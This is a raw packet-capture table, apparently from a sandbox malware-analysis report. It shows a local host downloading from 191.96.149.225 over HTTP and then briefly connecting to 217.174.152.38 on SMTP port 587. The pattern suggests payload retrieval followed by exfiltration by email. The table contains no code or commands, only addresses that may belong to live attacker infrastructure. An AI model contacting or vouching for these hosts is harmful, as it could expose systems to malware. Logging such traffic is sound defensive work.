Jan 13, 2021 20:42:46.262083054 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262109995 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262115955 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262145996 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262146950 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262192965 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262193918 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262236118 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262247086 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262273073 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262273073 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262320042 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262331009 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262358904 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262372017 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262398005 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262401104 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262434959 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262445927 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262473106 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262473106 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262517929 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262518883 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262561083 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262563944 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262597084 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262609959 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262634993 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262638092 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262674093 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262684107 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262710094 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262710094 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262748003 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262753010 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262784958 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262784958 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262820959 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262833118 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262867928 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262873888 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262907982 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262911081 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262943029 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262949944 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262981892 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262986898 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263036966 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263040066 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263075113 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263077974 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263117075 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263138056 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263150930 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263153076 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263186932 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263190985 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263226032 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263228893 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263262987 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263274908 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263310909 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263317108 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263351917 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263354063 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263386965 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263394117 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263437033 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263449907 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263470888 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263477087 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263509035 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263515949 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263551950 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263552904 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263587952 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263600111 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263636112 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263642073 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263676882 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263680935 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263715029 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263720036 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263756037 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263758898 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263794899 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263794899 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263832092 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.263834953 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.263870001 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.267100096 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418118954 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418160915 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418196917 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418234110 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418270111 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418304920 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418342113 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418378115 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418423891 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418448925 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418467045 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418498993 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418505907 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418507099 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418512106 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418518066 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418524981 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418530941 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418540001 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418544054 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418548107 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418549061 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418569088 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418586969 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418602943 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418625116 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418661118 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418662071 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418683052 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418700933 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418709993 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418747902 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418780088 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418790102 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418809891 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418828011 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418863058 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418867111 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418885946 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418905020 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418931961 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.418941975 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418978930 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.418984890 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419011116 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419017076 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419039965 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419064999 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419080973 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419106960 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419142962 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419143915 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419167042 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419182062 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419204950 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419220924 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419230938 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419258118 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419296026 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419298887 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419321060 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419336081 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419358969 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419384003 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419404030 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419429064 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419466019 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419466019 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419490099 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419503927 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419534922 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419540882 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419559002 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419579983 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419612885 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419616938 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419636965 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419656038 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419677973 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419703007 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419728041 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419744015 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419794083 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419801950 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419832945 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419836998 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419861078 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419871092 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419897079 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419908047 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419939995 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419945002 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.419955969 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.419982910 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420021057 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420028925 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420057058 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420070887 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420106888 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420106888 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420135975 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420147896 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420169115 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420186043 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420201063 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420222998 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420258999 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420259953 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420283079 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420300961 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420319080 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420348883 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420371056 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420389891 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420417070 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420428991 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420466900 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420468092 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420491934 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420505047 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420530081 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420540094 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420557976 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420578957 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420610905 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420615911 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420635939 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420664072 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420669079 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420706034 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420741081 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420742035 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420764923 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420783043 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420811892 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420820951 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420859098 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420859098 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420874119 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420897007 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420916080 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420933962 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420968056 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.420980930 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.420999050 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421024084 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421060085 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421060085 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421082020 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421099901 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421120882 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421137094 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421166897 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421174049 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421195984 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421211958 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421236992 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421250105 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421278954 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421295881 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421313047 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421339035 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421372890 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421375036 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421417952 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421447992 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421453953 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421489954 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421528101 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421528101 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421551943 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421569109 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421595097 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421607018 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421641111 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421643972 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421665907 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421681881 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421704054 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421717882 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421734095 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421765089 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421789885 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421806097 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421812057 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421843052 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421880960 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421884060 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421916008 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421917915 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421941996 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421955109 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.421981096 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.421992064 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.422018051 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.422029018 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.422061920 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.422075033 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.422091007 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.422117949 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.422153950 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.422157049 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.422190905 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.422220945 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.422250986 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.422280073 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.422298908 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.422322035 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.422333956 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.422338009 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.422385931 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.422390938 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.588229895 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.588273048 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.588310957 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.588346958 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.588383913 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.588403940 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.588422060 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.588437080 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.588443041 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.588458061 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.588466883 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.588469982 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.588512897 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.588520050 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.588550091 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.588558912 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.588588953 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.588593006 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.588632107 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.588877916 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.590727091 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.738390923 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.738634109 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:47.099772930 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:43:34.589207888 CET	49168	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:34.668273926 CET	587	49168	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:34.668401003 CET	49168	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:34.836627007 CET	587	49168	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:34.837357044 CET	49168	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:34.916750908 CET	587	49168	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:34.917283058 CET	49168	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:34.998734951 CET	587	49168	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:35.053045988 CET	49168	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:43:35.142657995 CET	587	49168	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:35.142719030 CET	587	49168	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:35.142751932 CET	587	49168	217.174.152.38	192.168.2.22
Jan 13, 2021 20:43:35.142962933 CET	49168	587	192.168.2.22	217.174.152.38
